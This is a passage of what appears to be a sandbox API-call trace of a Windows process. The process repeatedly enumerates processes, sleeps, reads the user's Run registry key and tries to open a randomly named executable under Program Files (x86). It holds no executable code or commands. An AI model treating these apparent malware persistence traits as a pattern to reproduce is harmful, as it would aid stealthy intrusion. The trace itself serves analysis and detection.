SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0245.609] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0245.609] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0245.610] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0245.610] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0245.610] NtClose (Handle=0x14c) returned 0x0 [0245.610] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0245.610] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0245.610] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0245.610] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0245.610] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0245.610] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0245.610] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0245.611] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0245.701] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0245.702] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0245.704] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0245.704] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0245.705] NtClose (Handle=0x14c) returned 0x0 [0245.705] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0245.705] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0245.705] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0245.705] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0245.705] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0245.705] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0245.705] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0245.705] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0245.805] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0245.805] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0245.813] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0245.813] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0245.813] NtClose (Handle=0x14c) returned 0x0 [0245.813] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0245.813] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0245.813] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0245.813] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0245.813] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0245.813] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0245.813] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0245.813] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0245.939] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0245.939] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0245.953] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0245.953] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0245.953] NtClose (Handle=0x14c) returned 0x0 [0245.953] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0245.953] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0245.953] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0245.954] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0245.954] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0245.954] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0245.954] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0245.954] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0246.040] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0246.041] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0246.047] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0246.047] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0246.047] NtClose (Handle=0x14c) returned 0x0 [0246.048] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0246.048] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0246.048] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0246.048] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0246.048] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0246.048] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0246.048] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0246.048] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0246.132] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0246.132] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0246.140] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0246.140] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0246.140] NtClose (Handle=0x14c) returned 0x0 [0246.140] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0246.140] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0246.141] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0246.141] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0246.141] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0246.141] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0246.141] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0246.141] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0246.247] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0246.248] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0246.251] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0246.251] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0246.251] NtClose (Handle=0x14c) returned 0x0 [0246.251] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0246.251] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0246.251] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0246.251] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0246.251] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0246.251] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0246.251] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0246.252] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0246.334] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0246.335] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0246.343] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0246.343] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0246.343] NtClose (Handle=0x14c) returned 0x0 [0246.343] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0246.343] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0246.344] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0246.344] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", 